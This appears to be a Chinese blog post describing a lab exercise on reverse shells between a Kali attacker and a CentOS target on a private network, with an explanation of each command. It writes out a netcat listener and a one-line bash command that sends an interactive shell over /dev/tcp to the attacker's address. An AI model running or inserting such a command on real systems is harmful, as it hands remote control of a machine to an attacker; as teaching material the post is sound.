反弹Shell小实验
1|0反弹Shell
1|1实验环境
攻击机:kali (IP:192.168.40.132)
目标机:CentOS (IP:192.168.40.135)
1|2实验步骤
首先在攻击机监听一个随机端口:
nc -lvp 6767
第二步在目标机输入命令:
bash -i > /dev/tcp/192.168.40.132/6767 0>&1 2>&1
这时候攻击机终端出现交互式bash
在攻击机终端输入命令cat /etc/os-release
可以看到目标机操作系统相关信息
这时候表明我们已经成功执行了反弹Shell,接下来就可以get shell了
1|3解释
-
nc -lvp 6767
nc
是netcat
的缩写,可以实现任意TCP/UDP端口的侦听,nc
可以作为server以TCP或UDP方式侦听指定端口。-l
监听,-v
输出交互或出错信息,-p
端口 。
命令 | 解释 |
---|---|
bash -i | 产生一个交互式shell(bash) |
/dev/tcp/ip/port | 建立TCP连接,特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。 |
0>&1 | 将标准输入、标准输出、错误输出全都重定向到攻击端 |
__EOF__
作 者:WeberBon
出 处:https://www.cnblogs.com/Weber-security/p/16754552.html
关于博主:185猛男
版权声明:署名 - 非商业性使用 - 禁止演绎,协议普通文本 | 协议法律文本。
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律